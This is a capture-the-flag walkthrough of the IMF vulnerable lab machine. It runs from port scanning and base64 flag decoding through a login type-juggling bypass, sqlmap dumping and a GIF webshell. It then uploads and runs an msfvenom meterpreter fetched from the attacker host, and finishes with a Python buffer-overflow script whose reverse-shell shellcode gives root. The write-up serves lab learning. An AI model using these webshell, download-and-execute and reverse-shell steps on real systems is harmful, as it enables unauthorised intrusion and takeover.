##Finding machine on the network:
##Nmap
nmap -sn 172.16.161.129/24
Scan for hosts on my local network which gave me a machine named "imf"
Now to run nmap on the machine itself:
nmap -Pn -oA imf-nmap-results -p 0-65525 172.16.161.129
Looks like port 80 is open.
After clicking through the pages on the site and viewing their sources I found this:
The first flag, having a = at the end looks base64 encoded.
echo YWxsdGhlZmlsZXM== | base64 -d
returns: allthefiles
Something I noticed on the contact page was some random weird named js files:
Those all might combine into a base64 string, lets check it out
echo ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ== | base64 -D
which returns: flag2{aW1mYWRtaW5pc3RyYXRvcg==}
after running:
echo aW1mYWRtaW5pc3RyYXRvcg== | base64 -D
I get:
imfadministrator
I tried browsing to: http://172.16.161.129/imfadministrator
Loads up a login page, upon viewing the page source I find:
I remembered seeing emails on the contact page, went page and sure enough roger is a user, rmichaels is his email.
Trying the user it seems the user is valid.
After some googling, looks like there is a potential authentication type conversion that might get us around authentication. Looking at a post changing the type of the data that is received server side could bypass authentication. Intercepting the HTTP post with burp and changing pass to pass[], this ends up sending an array down to the server instead of a string, improper handling of the input must be how we can get past it. Once the post is forwarded another flag: flag3{Y29udGludWVUT2Ntcw==} which decodes to: continueTOcms
sqlmap --url http://172.16.161.129/imfadministrator/cms.php?pagename=home --threads 5 --level 5 --cookie="PHPSESSID=phpsessionid" --dbms=MYSQL --dump
Important to remember the last two parameters, I missed these originally and totally didn't get some output for moving forward from the command line.
Another flag: flag4{dXBsb2Fkcjk0Mi5waHA=} which decodes to: uploadr942.php
flag5{YWdlbnRzZXJ2aWNlcw==} which decodes to: agentservices
Running ps -A through the webshell created to get flag5 I'm able to see all the processes running on the remote machine. One item that loks interesting is knockd, usually this would indicate that a port knocking sequence exists to open a service up to the public.
Running: netstat -vatn shows a list of the processes listening on TCP, 7788 and 22 look interesting
Trying to knock the default ports (7000 8000 9000)
for x in 7000 8000 9000; do nmap -T4 -p $x 192.168.1.20;done;
No luck though when trying to hit the interesting ports.
Trying to hit port 7788:
curl http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=nc localhost 7788
I get a little shell app. Given that we are investigating "agentservice" I do a find on agent:
curl http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=find%20/%20-name%20%22(asterisk)agent%22
Which found: /etc/xinetd.d/agent
curl http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=cat%20/etc/xinetd.d/agent
Gets:
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}
Looks like /usr/local/bin/agent is a service running.
curl -v http://172.16.161.1.129/imfadministrator/uploads/c59ca80d5d76.gif?c=ls%20-latr%20/usr/local/bin/agent
-rwxr-xr-x 1 root root 11896 Oct 12 22:39 /usr/local/bin/agent
The service runs as root, possibly a way in
In order to get a look at the binary I base64 encoded the file contents and saved it to a file locally:
curl -v http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=base64%20-w%200%20/usr/local/bin/agent
Then decoded it locally:
cat agentservice | base64 -d >> agentservicebinary
and finally decompiled the binary here: https://retdec.com/decompilation-run/
On line 37 it looks like the value: 0x2ddd984 assigns 48093572 to an int32_t variable that is used for checking if an agent's ID (passed into executable as a parameter is equal to 48093572), looks like a broken hard-coded authentication.
Also, I used this to convert the hex to an int:
echo $((0x2ddd984))
gave me: 48093572.
Next I create a meterpreter for reverse_tcp handling using msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.161.128 LPORT=4444 -f elf > imf-meterpreter
Now we need to get the file onto the remote machine, wget is probably the easiest.
Setting up a simple web server to host the file:
python -m SimpleHTTPServer
Now run wget on the remote machine:
curl -v http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=wget%20http://172.16.61.128:8000/imf-meterpreter
Make the meterpreter runnable:
curl -v http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=chmod%20777%20imf-meterpreter
curl -v http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=chmod%20a+x%20imf-meterpreter
Now we have a way to interact with the remote machine in metasploit
in MSF run:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 172.16.161.128
set LPORT 4444
run
Finally, run the script:
curl -v http://172.16.161.129/imfadministrator/uploads/c59ca80d5d76.gif?c=.%2Fimf-meterpreter
Once metrepreter prompt is up setup port forwarding for the service:
portfwd add -l 7788 -p 7788 -r 127.0.0.1
Open another terminal and hit the service:
nc localhost 7788
Now we can interact with the service its time to look at the source again to find a way to exploit.
Combing through the source on line 226:
gets((char *)&str);*
This reads user input, however the size of the input isn't defined, looks like a possible buffer overflow, basically we're passing in more information that the command is going to properly handle and extending the application's memory outside of it's contextual boundary causing an error to occur.
After doing some reading on ways to exploit the buffer overflow I stumbled onto the idea of return oriented programming, tl;dr; Its a way to execute a buffer overflow when defense mechanisms like code-signing and non-executable memory are employed. In this technique you can send machine language that is already in the machine's memory, whether through the program being exploited itself or other shared libraries. When these pieces when combined can be used to perform actions on the remote machine.
I was able to upload the agent binaries we got earlier to ropshell.com which analyzes the compiled code for items in memory that can be used in an exploit, in this case: call eax.
Ater reading through some reference docs for assembly, specifically x86 I have surmised that with our goal being getting a root shell by escaping the 'agent' service causing a buffer overflow to occur and running 'call eax.' In doing so we would be executing whatever is in the eax register. Another things we're going to need to do is make sure that our exploit is going to be at the address eax is referencing at runtime. I'm basing this on using the eax register in the processor can be used to execute code held at a memory address to circumvent normal program execution, in this case getting a root shell.
Now to generate a buffer to overflow using msfvenom:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.161.128 LPORT=4445 -f python -b "\x00\x0a\x0d"
This command will give up the buffer overflow shellcode for creating a reverse_tcp shell with my machine as the host and 4445 as the portand to exclude newline characters from the output.
Next write up a python script for using the exploit:
import socket
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('localhost', 7788))
client.recv(512)
client.send("48093572\n")
client.recv(512)
client.send("3\n")
client.recv(512)
#shellcode from msfvenom
buf = ""
buf += "\xd9\xc2\xba\xa6\xf9\x71\x23\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x12\x31\x50\x17\x03\x50\x17\x83\x4e\x05\x93"
buf += "\xd6\xbf\x2d\xa3\xfa\xec\x92\x1f\x97\x10\x9c\x41\xd7"
buf += "\x72\x53\x01\x8b\x23\xdb\x3d\x61\x53\x52\x3b\x80\x3b"
buf += "\xc9\xab\xd3\x3b\x79\xce\x13\x2a\x27\x47\xf2\xfc\xb1"
buf += "\x07\xa4\xaf\x8e\xab\xcf\xae\x3c\x2b\x9d\x58\xd1\x03"
buf += "\x51\xf0\x45\x73\xba\x62\xff\x02\x27\x30\xac\x9d\x49"
buf += "\x04\x59\x53\x09"
#padding
buf += "A" * (168 - len(buf))
#call eax gadget
buf += "\x63\x85\x04\x08\n"
client.send(buf)
Now start ncat for the exploit:
ncat -lv 172.16.161.128 4445
Then run the script: python payload.py
We're in!
cd /root
cat Flag6.txt | base64 -d yeilds: ~GhostProtocols
cat TheEnd.txt outputs the final you won thing.